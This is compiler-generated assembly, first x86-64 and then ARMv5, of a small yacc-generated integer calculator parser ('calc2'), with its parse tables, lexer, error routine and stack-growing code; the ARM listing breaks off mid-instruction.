.LFB10: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 32 mov QWORD PTR -24[rbp], rdi mov QWORD PTR -32[rbp], rsi mov DWORD PTR -4[rbp], 0 mov DWORD PTR -16[rbp], 0 mov DWORD PTR calc2_nerrs[rip], 0 mov DWORD PTR calc2_errflag[rip], 0 mov DWORD PTR calc2_char[rip], -1 mov DWORD PTR -12[rbp], 0 mov rax, QWORD PTR yystack[rip+8] test rax, rax jne .L20 lea rdi, yystack[rip] call yygrowstack cmp eax, -2 je .L72 .L20: mov rax, QWORD PTR yystack[rip+8] mov QWORD PTR yystack[rip+16], rax mov rax, QWORD PTR yystack[rip+32] mov QWORD PTR yystack[rip+40], rax mov DWORD PTR -12[rbp], 0 mov rax, QWORD PTR yystack[rip+16] mov WORD PTR [rax], 0 .L22: mov eax, DWORD PTR -12[rbp] cdqe lea rdx, [rax+rax] lea rax, calc2_defred[rip] movzx eax, WORD PTR [rdx+rax] cwde mov DWORD PTR -16[rbp], eax cmp DWORD PTR -16[rbp], 0 jne .L73 mov eax, DWORD PTR calc2_char[rip] test eax, eax jns .L25 mov rax, QWORD PTR -32[rbp] mov rdi, rax call calc2_lex mov DWORD PTR calc2_char[rip], eax mov eax, DWORD PTR calc2_char[rip] test eax, eax jns .L25 mov DWORD PTR calc2_char[rip], 0 .L25: mov eax, DWORD PTR -12[rbp] cdqe lea rdx, [rax+rax] lea rax, calc2_sindex[rip] movzx eax, WORD PTR [rdx+rax] cwde mov DWORD PTR -16[rbp], eax cmp DWORD PTR -16[rbp], 0 je .L26 mov eax, DWORD PTR calc2_char[rip] add DWORD PTR -16[rbp], eax cmp DWORD PTR -16[rbp], 0 js .L26 cmp DWORD PTR -16[rbp], 220 jg .L26 mov eax, DWORD PTR -16[rbp] cdqe lea rdx, [rax+rax] lea rax, calc2_check[rip] movzx eax, WORD PTR [rdx+rax] mov edx, DWORD PTR calc2_char[rip] cmp ax, dx jne .L26 mov rdx, QWORD PTR yystack[rip+16] mov rax, QWORD PTR yystack[rip+24] cmp rdx, rax jb .L27 lea rdi, yystack[rip] call yygrowstack cmp eax, -2 je .L74 .L27: mov eax, DWORD PTR -16[rbp] cdqe lea rdx, [rax+rax] lea rax, calc2_table[rip] movzx eax, WORD PTR [rdx+rax] cwde mov DWORD PTR -12[rbp], eax mov rax, QWORD PTR yystack[rip+16] add rax, 2 mov QWORD PTR yystack[rip+16], rax mov rax, QWORD PTR yystack[rip+16] mov edx, DWORD PTR -16[rbp] movsx rdx, edx lea rcx, [rdx+rdx] lea rdx, calc2_table[rip] movzx edx, WORD PTR [rcx+rdx] mov WORD PTR [rax], dx mov rax, QWORD PTR yystack[rip+40] add rax, 4 mov QWORD PTR yystack[rip+40], rax mov rax, QWORD PTR yystack[rip+40] mov edx, DWORD PTR calc2_lval[rip] mov DWORD PTR [rax], edx mov DWORD PTR calc2_char[rip], -1 mov eax, DWORD PTR calc2_errflag[rip] test eax, eax jle .L22 mov eax, DWORD PTR calc2_errflag[rip] sub eax, 1 mov DWORD PTR calc2_errflag[rip], eax jmp .L22 .L26: mov eax, DWORD PTR -12[rbp] cdqe lea rdx, [rax+rax] lea rax, calc2_rindex[rip] movzx eax, WORD PTR [rdx+rax] cwde mov DWORD PTR -16[rbp], eax cmp DWORD PTR -16[rbp], 0 je .L29 mov eax, DWORD PTR calc2_char[rip] add DWORD PTR -16[rbp], eax cmp DWORD PTR -16[rbp], 0 js .L29 cmp DWORD PTR -16[rbp], 220 jg .L29 mov eax, DWORD PTR -16[rbp] cdqe lea rdx, [rax+rax] lea rax, calc2_check[rip] movzx eax, WORD PTR [rdx+rax] mov edx, DWORD PTR calc2_char[rip] cmp ax, dx jne .L29 mov eax, DWORD PTR -16[rbp] cdqe lea rdx, [rax+rax] lea rax, calc2_table[rip] movzx eax, WORD PTR [rdx+rax] cwde mov DWORD PTR -16[rbp], eax jmp .L24 .L29: mov eax, DWORD PTR calc2_errflag[rip] test eax, eax jne .L75 mov rcx, QWORD PTR -32[rbp] mov rax, QWORD PTR -24[rbp] lea rdx, .LC1[rip] mov rsi, rcx mov rdi, rax call calc2_error nop .L32: mov eax, DWORD PTR calc2_nerrs[rip] add eax, 1 mov DWORD PTR calc2_nerrs[rip], eax jmp .L31 .L75: nop .L31: mov eax, DWORD PTR calc2_errflag[rip] cmp eax, 2 jg .L33 mov DWORD PTR calc2_errflag[rip], 3 .L38: mov rax, QWORD PTR yystack[rip+16] movzx eax, WORD PTR [rax] cwde cdqe lea rdx, [rax+rax] lea rax, calc2_sindex[rip] movzx eax, WORD PTR [rdx+rax] cwde mov DWORD PTR -16[rbp], eax cmp DWORD PTR -16[rbp], 0 je .L34 add DWORD PTR -16[rbp], 256 cmp DWORD PTR -16[rbp], 0 js .L34 cmp DWORD PTR -16[rbp], 220 jg .L34 mov eax, DWORD PTR -16[rbp] cdqe lea rdx, [rax+rax] lea rax, calc2_check[rip] movzx eax, WORD PTR [rdx+rax] cmp ax, 256 jne .L34 mov rdx, QWORD PTR yystack[rip+16] mov rax, QWORD PTR yystack[rip+24] cmp rdx, rax jb .L35 lea rdi, yystack[rip] call yygrowstack cmp eax, -2 je .L76 .L35: mov eax, DWORD PTR -16[rbp] cdqe lea rdx, [rax+rax] lea rax, calc2_table[rip] movzx eax, WORD PTR [rdx+rax] cwde mov DWORD PTR -12[rbp], eax mov rax, QWORD PTR yystack[rip+16] add rax, 2 mov QWORD PTR yystack[rip+16], rax mov rax, QWORD PTR yystack[rip+16] mov edx, DWORD PTR -16[rbp] movsx rdx, edx lea rcx, [rdx+rdx] lea rdx, calc2_table[rip] movzx edx, WORD PTR [rcx+rdx] mov WORD PTR [rax], dx mov rax, QWORD PTR yystack[rip+40] add rax, 4 mov QWORD PTR yystack[rip+40], rax mov rax, QWORD PTR yystack[rip+40] mov edx, DWORD PTR calc2_lval[rip] mov DWORD PTR [rax], edx jmp .L22 .L34: mov rdx, QWORD PTR yystack[rip+16] mov rax, QWORD PTR yystack[rip+8] cmp rdx, rax jbe .L77 mov rax, QWORD PTR yystack[rip+16] sub rax, 2 mov QWORD PTR yystack[rip+16], rax mov rax, QWORD PTR yystack[rip+40] sub rax, 4 mov QWORD PTR yystack[rip+40], rax jmp .L38 .L33: mov eax, DWORD PTR calc2_char[rip] test eax, eax je .L78 mov DWORD PTR calc2_char[rip], -1 jmp .L22 .L73: nop .L24: mov eax, DWORD PTR -16[rbp] cdqe lea rdx, [rax+rax] lea rax, calc2_len[rip] movzx eax, WORD PTR [rdx+rax] cwde mov DWORD PTR -4[rbp], eax cmp DWORD PTR -4[rbp], 0 jle .L40 mov rdx, QWORD PTR yystack[rip+40] mov eax, 1 sub eax, DWORD PTR -4[rbp] cdqe sal rax, 2 add rax, rdx mov eax, DWORD PTR [rax] mov DWORD PTR calc2_val[rip], eax jmp .L41 .L40: mov DWORD PTR calc2_val[rip], 0 .L41: mov eax, DWORD PTR -16[rbp] sub eax, 3 cmp eax, 15 ja .L79 mov eax, eax lea rdx, 0[0+rax*4] lea rax, .L44[rip] mov eax, DWORD PTR [rdx+rax] cdqe lea rdx, .L44[rip] add rax, rdx notrack jmp rax .section .rodata .align 4 .align 4 .L44: .long .L58-.L44 .long .L57-.L44 .long .L56-.L44 .long .L55-.L44 .long .L54-.L44 .long .L53-.L44 .long .L52-.L44 .long .L51-.L44 .long .L50-.L44 .long .L49-.L44 .long .L48-.L44 .long .L47-.L44 .long .L46-.L44 .long .L79-.L44 .long .L45-.L44 .long .L43-.L44 .text .L58: mov DWORD PTR calc2_errflag[rip], 0 jmp .L59 .L57: mov rax, QWORD PTR yystack[rip+40] mov eax, DWORD PTR [rax] mov esi, eax lea rdi, .LC2[rip] mov eax, 0 call printf@PLT jmp .L59 .L56: mov rax, QWORD PTR yystack[rip+40] mov rdx, QWORD PTR yystack[rip+40] sub rdx, 8 mov edx, DWORD PTR [rdx] movsx rdx, edx lea rcx, 0[0+rdx*4] mov rdx, QWORD PTR -24[rbp] add rdx, rcx mov eax, DWORD PTR [rax] mov DWORD PTR [rdx], eax jmp .L59 .L55: mov rax, QWORD PTR yystack[rip+40] mov eax, DWORD PTR -4[rax] mov DWORD PTR calc2_val[rip], eax jmp .L59 .L54: mov rax, QWORD PTR yystack[rip+40] sub rax, 8 mov edx, DWORD PTR [rax] mov rax, QWORD PTR yystack[rip+40] mov eax, DWORD PTR [rax] add eax, edx mov DWORD PTR calc2_val[rip], eax jmp .L59 .L53: mov rax, QWORD PTR yystack[rip+40] sub rax, 8 mov edx, DWORD PTR [rax] mov rax, QWORD PTR yystack[rip+40] mov ecx, DWORD PTR [rax] mov eax, edx sub eax, ecx mov DWORD PTR calc2_val[rip], eax jmp .L59 .L52: mov rax, QWORD PTR yystack[rip+40] sub rax, 8 mov edx, DWORD PTR [rax] mov rax, QWORD PTR yystack[rip+40] mov eax, DWORD PTR [rax] imul eax, edx mov DWORD PTR calc2_val[rip], eax jmp .L59 .L51: mov rax, QWORD PTR yystack[rip+40] sub rax, 8 mov eax, DWORD PTR [rax] mov rdx, QWORD PTR yystack[rip+40] mov esi, DWORD PTR [rdx] cdq idiv esi mov DWORD PTR calc2_val[rip], eax jmp .L59 .L50: mov rax, QWORD PTR yystack[rip+40] sub rax, 8 mov eax, DWORD PTR [rax] mov rdx, QWORD PTR yystack[rip+40] mov ecx, DWORD PTR [rdx] cdq idiv ecx mov eax, edx mov DWORD PTR calc2_val[rip], eax jmp .L59 .L49: mov rax, QWORD PTR yystack[rip+40] sub rax, 8 mov edx, DWORD PTR [rax] mov rax, QWORD PTR yystack[rip+40] mov eax, DWORD PTR [rax] and eax, edx mov DWORD PTR calc2_val[rip], eax jmp .L59 .L48: mov rax, QWORD PTR yystack[rip+40] sub rax, 8 mov edx, DWORD PTR [rax] mov rax, QWORD PTR yystack[rip+40] mov eax, DWORD PTR [rax] or eax, edx mov DWORD PTR calc2_val[rip], eax jmp .L59 .L47: mov rax, QWORD PTR yystack[rip+40] mov eax, DWORD PTR [rax] neg eax mov DWORD PTR calc2_val[rip], eax jmp .L59 .L46: mov rax, QWORD PTR yystack[rip+40] mov eax, DWORD PTR [rax] cdqe lea rdx, 0[0+rax*4] mov rax, QWORD PTR -24[rbp] add rax, rdx mov eax, DWORD PTR [rax] mov DWORD PTR calc2_val[rip], eax jmp .L59 .L45: mov rax, QWORD PTR yystack[rip+40] mov eax, DWORD PTR [rax] mov DWORD PTR calc2_val[rip], eax mov rax, QWORD PTR yystack[rip+40] mov eax, DWORD PTR [rax] test eax, eax jne .L60 mov edx, 8 jmp .L61 .L60: mov edx, 10 .L61: mov rax, QWORD PTR -32[rbp] mov DWORD PTR [rax], edx jmp .L59 .L43: mov rax, QWORD PTR -32[rbp] mov edx, DWORD PTR [rax] mov rax, QWORD PTR yystack[rip+40] sub rax, 4 mov eax, DWORD PTR [rax] imul edx, eax mov rax, QWORD PTR yystack[rip+40] mov eax, DWORD PTR [rax] add eax, edx mov DWORD PTR calc2_val[rip], eax jmp .L59 .L79: nop .L59: mov rdx, QWORD PTR yystack[rip+16] mov eax, DWORD PTR -4[rbp] cdqe add rax, rax neg rax add rax, rdx mov QWORD PTR yystack[rip+16], rax mov rax, QWORD PTR yystack[rip+16] movzx eax, WORD PTR [rax] cwde mov DWORD PTR -12[rbp], eax mov rdx, QWORD PTR yystack[rip+40] mov eax, DWORD PTR -4[rbp] cdqe sal rax, 2 neg rax add rax, rdx mov QWORD PTR yystack[rip+40], rax mov eax, DWORD PTR -16[rbp] cdqe lea rdx, [rax+rax] lea rax, calc2_lhs[rip] movzx eax, WORD PTR [rdx+rax] cwde mov DWORD PTR -4[rbp], eax cmp DWORD PTR -12[rbp], 0 jne .L62 cmp DWORD PTR -4[rbp], 0 jne .L62 mov DWORD PTR -12[rbp], 1 mov rax, QWORD PTR yystack[rip+16] add rax, 2 mov QWORD PTR yystack[rip+16], rax mov rax, QWORD PTR yystack[rip+16] mov WORD PTR [rax], 1 mov rax, QWORD PTR yystack[rip+40] add rax, 4 mov QWORD PTR yystack[rip+40], rax mov rax, QWORD PTR yystack[rip+40] mov edx, DWORD PTR calc2_val[rip] mov DWORD PTR [rax], edx mov eax, DWORD PTR calc2_char[rip] test eax, eax jns .L63 mov rax, QWORD PTR -32[rbp] mov rdi, rax call calc2_lex mov DWORD PTR calc2_char[rip], eax mov eax, DWORD PTR calc2_char[rip] test eax, eax jns .L63 mov DWORD PTR calc2_char[rip], 0 .L63: mov eax, DWORD PTR calc2_char[rip] test eax, eax je .L80 jmp .L22 .L62: mov eax, DWORD PTR -4[rbp] cdqe lea rdx, [rax+rax] lea rax, calc2_gindex[rip] movzx eax, WORD PTR [rdx+rax] cwde mov DWORD PTR -16[rbp], eax cmp DWORD PTR -16[rbp], 0 je .L66 mov eax, DWORD PTR -12[rbp] add DWORD PTR -16[rbp], eax cmp DWORD PTR -16[rbp], 0 js .L66 cmp DWORD PTR -16[rbp], 220 jg .L66 mov eax, DWORD PTR -16[rbp] cdqe lea rdx, [rax+rax] lea rax, calc2_check[rip] movzx eax, WORD PTR [rdx+rax] mov edx, DWORD PTR -12[rbp] cmp ax, dx jne .L66 mov eax, DWORD PTR -16[rbp] cdqe lea rdx, [rax+rax] lea rax, calc2_table[rip] movzx eax, WORD PTR [rdx+rax] cwde mov DWORD PTR -12[rbp], eax jmp .L67 .L66: mov eax, DWORD PTR -4[rbp] cdqe lea rdx, [rax+rax] lea rax, calc2_dgoto[rip] movzx eax, WORD PTR [rdx+rax] cwde mov DWORD PTR -12[rbp], eax .L67: mov rdx, QWORD PTR yystack[rip+16] mov rax, QWORD PTR yystack[rip+24] cmp rdx, rax jb .L68 lea rdi, yystack[rip] call yygrowstack cmp eax, -2 je .L81 .L68: mov rax, QWORD PTR yystack[rip+16] add rax, 2 mov QWORD PTR yystack[rip+16], rax mov rax, QWORD PTR yystack[rip+16] mov edx, DWORD PTR -12[rbp] mov WORD PTR [rax], dx mov rax, QWORD PTR yystack[rip+40] add rax, 4 mov QWORD PTR yystack[rip+40], rax mov rax, QWORD PTR yystack[rip+40] mov edx, DWORD PTR calc2_val[rip] mov DWORD PTR [rax], edx jmp .L22 .L72: nop jmp .L21 .L74: nop jmp .L21 .L76: nop jmp .L21 .L81: nop .L21: mov rcx, QWORD PTR -32[rbp] mov rax, QWORD PTR -24[rbp] lea rdx, .LC3[rip] mov rsi, rcx mov rdi, rax call calc2_error mov DWORD PTR -8[rbp], 2 jmp .L69 .L77: nop jmp .L37 .L78: nop .L37: mov DWORD PTR -8[rbp], 1 jmp .L69 .L80: nop .L65: mov DWORD PTR -8[rbp], 0 .L69: mov eax, DWORD PTR -8[rbp] leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE10: .size calc2_parse, .-calc2_parse .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "348587.c" .text .section .rodata .align 2 .type calc2_lhs, %object .size calc2_lhs, 38 calc2_lhs: .short -1 .short 0 .short 0 .short 0 .short 1 .short 1 .short 2 .short 2 .short 2 .short 2 .short 2 .short 2 .short 2 .short 2 .short 2 .short 2 .short 2 .short 3 .short 3 .align 2 .type calc2_len, %object .size calc2_len, 38 calc2_len: .short 2 .short 0 .short 3 .short 3 .short 1 .short 3 .short 3 .short 3 .short 3 .short 3 .short 3 .short 3 .short 3 .short 3 .short 2 .short 1 .short 1 .short 1 .short 2 .align 2 .type calc2_defred, %object .size calc2_defred, 66 calc2_defred: .short 1 .short 0 .short 0 .short 17 .short 0 .short 0 .short 0 .short 0 .short 0 .short 0 .short 3 .short 0 .short 15 .short 14 .short 0 .short 2 .short 0 .short 0 .short 0 .short 0 .short 0 .short 0 .short 0 .short 18 .short 0 .short 6 .short 0 .short 0 .short 0 .short 0 .short 9 .short 10 .short 11 .align 2 .type calc2_dgoto, %object .size calc2_dgoto, 8 calc2_dgoto: .short 1 .short 7 .short 8 .short 9 .align 2 .type calc2_sindex, %object .size calc2_sindex, 66 calc2_sindex: .short 0 .short -40 .short -7 .short 0 .short -55 .short -38 .short -38 .short 1 .short -29 .short -247 .short 0 .short -38 .short 0 .short 0 .short 22 .short 0 .short -38 .short -38 .short -38 .short -38 .short -38 .short -38 .short -38 .short 0 .short -29 .short 0 .short 51 .short 60 .short -20 .short -20 .short 0 .short 0 .short 0 .align 2 .type calc2_rindex, %object .size calc2_rindex, 66 calc2_rindex: .short 0 .short 0 .short 0 .short 0 .short 2 .short 0 .short 0 .short 0 .short 9 .short -9 .short 0 .short 0 .short 0 .short 0 .short 0 .short 0 .short 0 .short 0 .short 0 .short 0 .short 0 .short 0 .short 0 .short 0 .short 10 .short 0 .short -6 .short 14 .short 5 .short 13 .short 0 .short 0 .short 0 .align 2 .type calc2_gindex, %object .size calc2_gindex, 8 calc2_gindex: .short 0 .short 0 .short 65 .short 0 .align 2 .type calc2_table, %object .size calc2_table, 442 calc2_table: .short 6 .short 16 .short 6 .short 10 .short 13 .short 5 .short 11 .short 5 .short 22 .short 17 .short 23 .short 15 .short 15 .short 20 .short 18 .short 7 .short 19 .short 22 .short 21 .short 4 .short 5 .short 0 .short 20 .short 8 .short 12 .short 0 .short 0 .short 21 .short 16 .short 16 .short 0 .short 0 .short 16 .short 16 .short 16 .short 13 .short 16 .short 0 .short 16 .short 15 .short 15 .short 0 .short 0 .short 7 .short 15 .short 15 .short 7 .short 15 .short 7 .short 15 .short 7 .short 8 .short 12 .short 0 .short 8 .short 12 .short 8 .short 0 .short 8 .short 22 .short 17 .short 0 .short 0 .short 25 .short 20 .short 18 .short 0 .short 19 .short 0 .short 21 .short 13 .short 14 .short 0 .short 0 .short 0 .short 0 .short 24 .short 0 .short 0 .short 0 .short 0 .short 26 .short 27 .short 28 .short 29 .short 30 .short 31 .short 32 .short 22 .short 17 .short 0 .short 0 .short 0 .short 20 .short 18 .short 16 .short 19 .short 22 .short 21 .short 0 .short 0 .short 0 .short 20 .short 18 .short 0 .short 19 .short 0 .short 21 .short 0 .short 0 .short 0 .short 0 .short 0 .short 0 .short 0 .short 16 .short 0 .short 0 .short 13 .short 0 .short 0 .short 0 .short 0 .short 0 .short 0 .short 0 .short 15 .short 0 .short 0 .short 7 .short 0 .short 0 .short 0 .short 0 .short 0 .short 0 .short 0 .short 8 .short 12 .short 0 .short 0 .short 0 .short 0 .short 0 .short 0 .short 0 .short 16 .short 0 .short 0 .short 0 .short 0 .short 0 .short 0 .short 0 .short 0 .short 0 .short 0 .short 0 .short 0 .short 0 .short 0 .short 0 .short 0 .short 0 .short 0 .short 0 .short 0 .short 0 .short 0 .short 0 .short 0 .short 0 .short 0 .short 0 .short 0 .short 0 .short 0 .short 0 .short 0 .short 0 .short 0 .short 0 .short 0 .short 0 .short 0 .short 0 .short 0 .short 0 .short 0 .short 0 .short 0 .short 0 .short 0 .short 0 .short 0 .short 0 .short 0 .short 0 .short 0 .short 0 .short 0 .short 0 .short 0 .short 0 .short 0 .short 0 .short 0 .short 0 .short 0 .short 0 .short 0 .short 0 .short 0 .short 0 .short 0 .short 0 .short 2 .short 3 .short 4 .short 3 .short 12 .align 2 .type calc2_check, %object .size calc2_check, 442 calc2_check: .short 40 .short 10 .short 40 .short 10 .short 10 .short 45 .short 61 .short 45 .short 37 .short 38 .short 257 .short 10 .short 10 .short 42 .short 43 .short 10 .short 45 .short 37 .short 47 .short 10 .short 10 .short -1 .short 42 .short 10 .short 10 .short -1 .short -1 .short 47 .short 37 .short 38 .short -1 .short -1 .short 41 .short 42 .short 43 .short 41 .short 45 .short -1 .short 47 .short 37 .short 38 .short -1 .short -1 .short 38 .short 42 .short 43 .short 41 .short 45 .short 43 .short 47 .short 45 .short 38 .short 38 .short -1 .short 41 .short 41 .short 43 .short -1 .short 45 .short 37 .short 38 .short -1 .short -1 .short 41 .short 42 .short 43 .short -1 .short 45 .short -1 .short 47 .short 5 .short 6 .short -1 .short -1 .short -1 .short -1 .short 11 .short -1 .short -1 .short -1 .short -1 .short 16 .short 17 .short 18 .short 19 .short 20 .short 21 .short 22 .short 37 .short 38 .short -1 .short -1 .short -1 .short 42 .short 43 .short 124 .short 45 .short 37 .short 47 .short -1 .short -1 .short -1 .short 42 .short 43 .short -1 .short 45 .short -1 .short 47 .short -1 .short -1 .short -1 .short -1 .short -1 .short -1 .short -1 .short 124 .short -1 .short -1 .short 124 .short -1 .short -1 .short -1 .short -1 .short -1 .short -1 .short -1 .short 124 .short -1 .short -1 .short 124 .short -1 .short -1 .short -1 .short -1 .short -1 .short -1 .short -1 .short 124 .short 124 .short -1 .short -1 .short -1 .short -1 .short -1 .short -1 .short -1 .short 124 .short -1 .short -1 .short -1 .short -1 .short -1 .short -1 .short -1 .short -1 .short -1 .short -1 .short -1 .short -1 .short -1 .short -1 .short -1 .short -1 .short -1 .short -1 .short -1 .short -1 .short -1 .short -1 .short -1 .short -1 .short -1 .short -1 .short -1 .short -1 .short -1 .short -1 .short -1 .short -1 .short -1 .short -1 .short -1 .short -1 .short -1 .short -1 .short -1 .short -1 .short -1 .short -1 .short -1 .short -1 .short -1 .short -1 .short -1 .short -1 .short -1 .short -1 .short -1 .short -1 .short -1 .short -1 .short -1 .short -1 .short -1 .short -1 .short -1 .short -1 .short -1 .short -1 .short -1 .short -1 .short -1 .short -1 .short -1 .short -1 .short -1 .short 256 .short 257 .short 258 .short 257 .short 258 .comm calc2_errflag,4,4 .comm calc2_char,4,4 .comm calc2_val,4,4 .comm calc2_lval,4,4 .comm calc2_nerrs,4,4 .local yystack .comm yystack,24,4 .align 2 .LC0: .word __stack_chk_guard .text .align 2 .global main .syntax unified .arm .fpu softvfp .type main, %function main: @ args = 0, pretend = 0, frame = 112 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #112 ldr r3, .L6 ldr r3, [r3] str r3, [fp, #-8] mov r3,#0 mov r3, #10 str r3, [fp, #-116] b .L2 .L3: sub r2, fp, #116 sub r3, fp, #112 mov r1, r2 mov r0, r3 bl calc2_parse .L2: ldr r3, .L6+4 ldr r3, [r3] mov r0, r3 bl feof mov r3, r0 cmp r3, #0 beq .L3 mov r3, #0 ldr r2, .L6 ldr r1, [r2] ldr r2, [fp, #-8] eors r1, r2, r1 mov r2, #0 beq .L5 bl __stack_chk_fail .L5: mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .L7: .align 2 .L6: .word .LC0 .word stdin .size main, .-main .section .rodata .align 2 .LC1: .ascii "%s\012\000" .text .align 2 .syntax unified .arm .fpu softvfp .type calc2_error, %function calc2_error: @ args = 0, pretend = 0, frame = 16 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #16 str r0, [fp, #-8] str r1, [fp, #-12] str r2, [fp, #-16] ldr r3, .L9 ldr r3, [r3] ldr r2, [fp, #-16] ldr r1, .L9+4 mov r0, r3 bl fprintf nop sub sp, fp, #4 @ sp needed pop {fp, pc} .L10: .align 2 .L9: .word stderr .word .LC1 .size calc2_error, .-calc2_error .global __aeabi_idivmod .align 2 .global calc2_lex .syntax unified .arm .fpu softvfp .type calc2_lex, %function calc2_lex: @ args = 0, pretend = 0, frame = 16 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #16 str r0, [fp, #-16] nop .L12: bl getchar str r0, [fp, #-8] ldr r3, [fp, #-8] cmp r3, #32 beq .L12 bl __ctype_b_loc mov r3, r0 ldr r2, [r3] ldr r3, [fp, #-8] lsl r3, r3, #1 add r3, r2, r3 ldrh r3, [r3] and r3, r3, #512 cmp r3, #0 beq .L13 ldr r3, [fp, #-8] sub r3, r3, #97 ldr r2, .L16 str r3, [r2] ldr r3, .L16+4 b .L14 .L13: bl __ctype_b_loc mov r3, r0 ldr r2, [r3] ldr r3, [fp, #-8] lsl r3, r3, #1 add r3, r2, r3 ldrh r3, [r3] and r3, r3, #2048 cmp r3, #0 beq .L15 ldr r3, [fp, #-8] sub r2, r3, #48 ldr r3, [fp, #-16] ldr r3, [r3] mov r1, r3 mov r0, r2 bl __aeabi_idivmod mov r3, r1 mov r2, r3 ldr r3, .L16 str r2, [r3] ldr r3, .L16+8 b .L14 .L15: ldr r3, [fp, #-8] .L14: mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .L17: .align 2 .L16: .word calc2_lval .word 258 .word 257 .size calc2_lex, .-calc2_lex .align 2 .syntax unified .arm .fpu softvfp .type yygrowstack, %function yygrowstack: @ args = 0, pretend = 0, frame = 24 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #24 str r0, [fp, #-24] ldr r3, [fp, #-24] ldr r3, [r3] str r3, [fp, #-20] ldr r3, [fp, #-20] cmp r3, #0 bne .L19 mov r3, #200 str r3, [fp, #-20] b .L20 .L19: ldr r3, [fp, #-20] ldr r2, .L25 cmp r3, r2 bls .L21 mvn r3, #1 b .L22 .L21: ldr r3, [fp, #-20] lsl r3, r3, #1 str r3, [fp, #-20] ldr r3, [fp, #-20] ldr r2, .L25+4 cmp r3, r2 bls .L20 ldr r3, .L25+4 str r3, [fp, #-20] .L20: ldr r3, [fp, #-24] ldr r2, [r3, #8] ldr r3, [fp, #-24] ldr r3, [r3, #4] sub r3, r2, r3 asr r3, r3, #1 str r3, [fp, #-16] ldr r3, [fp, #-24] ldr r2, [r3, #4] ldr r3, [fp, #-20] lsl r3, r3, #1 mov r1, r3 mov r0, r2 bl realloc str r0, [fp, #-12] ldr r3, [fp, #-12] cmp r3, #0 bne .L23 mvn r3, #1 b .L22 .L23: ldr r3, [fp, #-24] ldr r2, [fp, #-12] str r2, [r3, #4] ldr r3, [fp, #-16] lsl r3, r3, #1 ldr r2, [fp, #-12] add r2, r2, r3 ldr r3, [fp, #-24] str r2, [r3, #8] ldr r3, [fp, #-24] ldr r2, [r3, #16] ldr r3, [fp, #-20] lsl r3, r3, #2 mov r1, r3 mov r0, r2 bl realloc str r0, [fp, #-8] ldr r3, [fp, #-8] cmp r3, #0 bne .L24 mvn r3, #1 b .L22 .L24: ldr r3, [fp, #-24] ldr r2, [fp, #-8] str r2, [r3, #16] ldr r3, [fp, #-16] lsl r3, r3, #2 ldr r2, [fp, #-8] add r2, r2, r3 ldr r3, [fp, #-24] str r2, [r3, #20] ldr r3, [fp, #-24] ldr r2, [fp, #-20] str r2, [r3] ldr r3, [fp, #-24] ldr r2, [r3, #4] ldr r3, [fp, #-20] sub r3, r3, #-2147483647 lsl r3, r3, #1 add r2, r2, r3 ldr r3, [fp, #-24] str r2, [r3, #12] mov r3, #0 .L22: mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .L26: .align 2 .L25: .word 9999 .word 10000 .size yygrowstack, .-yygrowstack .section .rodata .align 2 .LC2: .ascii "syntax error\000" .align 2 .LC3: .ascii "%d\012\000" .global __aeabi_idiv .align 2 .LC4: .ascii "yacc stack overflow\000" .text .align 2 .global calc2_parse .syntax unified .arm .fpu softvfp .type calc2_parse, %function calc2_parse: @ args = 0, pretend = 0, frame = 24 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #24 str r0, [fp, #-24] str r1, [fp, #-28] mov r3, #0 str r3, [fp, #-8] mov r3, #0 str r3, [fp, #-20] ldr r3, .L90 mov r2, #0 str r2, [r3] ldr r3, .L90+4 mov r2, #0 str r2, [r3] ldr r3, .L90+8 mvn r2, #0 str r2, [r3] mov r3, #0 str r3, [fp, #-16] ldr r3, .L90+12 ldr r3, [r3, #4] cmp r3, #0 bne .L28 ldr r0, .L90+12 bl yygrowstack mov r3, r0 cmn r3, #2 beq .L80 .L28: ldr r3, .L90+12 ldr r3, [r3, #4] ldr r2, .L90+12 str r3, [r2, #8] ldr r3, .L90+12 ldr r3, [r3, #16] ldr r2, .L90+12 str r3, [r2, #20] mov r3, #0 str r3, [fp, #-16] ldr r3, .L90+12 ldr r3, [r3, #8] mov r2, #0 strh r2, [r3] @ movhi .L30: ldr r2, .L90+16 ldr r3, [fp, #-16] lsl r3, r3, #1 add r3, r2, r3 ldrsh r3, [r3] str r3, [fp, #-20] ldr r3, [fp, #-20] cmp r3, #0 bne .L81 ldr r3, .L90+8 ldr r3, [r3] cmp r3, #0 bge .L33 ldr r0, [fp, #-28] bl calc2_lex mov r3, r0 ldr r2, .L90+8 str r3, [r2] ldr r3, .L90+8 ldr r3, [r3] cmp r3, #0 bge .L33 ldr r3, .L90+8 mov r2, #0 str r2, [r3] .L33: ldr r2, .L90+20 ldr r3, [fp, #-16] lsl r3, r3, #1 add r3, r2, r3 ldrsh r3, [r3] str r3, [fp, #-20] ldr r3, [fp, #-20] cmp r3, #0 beq .L34 ldr r3, .L90+8 ldr r3, [r3] ldr r2, [fp, #-20] add r3, r2, r3 str r3, [fp, #-20] ldr r3, [fp, #-20] cmp r3, #0 blt .L34 ldr r3, [fp, #-20] cmp r3, #220 bgt .L34 ldr r2, .L90+24 ldr r3, [fp, #-20] lsl r3, r3, #1 add r3, r2, r3 ldrsh r2, [r3] ldr r3, .L90+8 ldr r3, [r3] lsl r3, r3, #16 asr 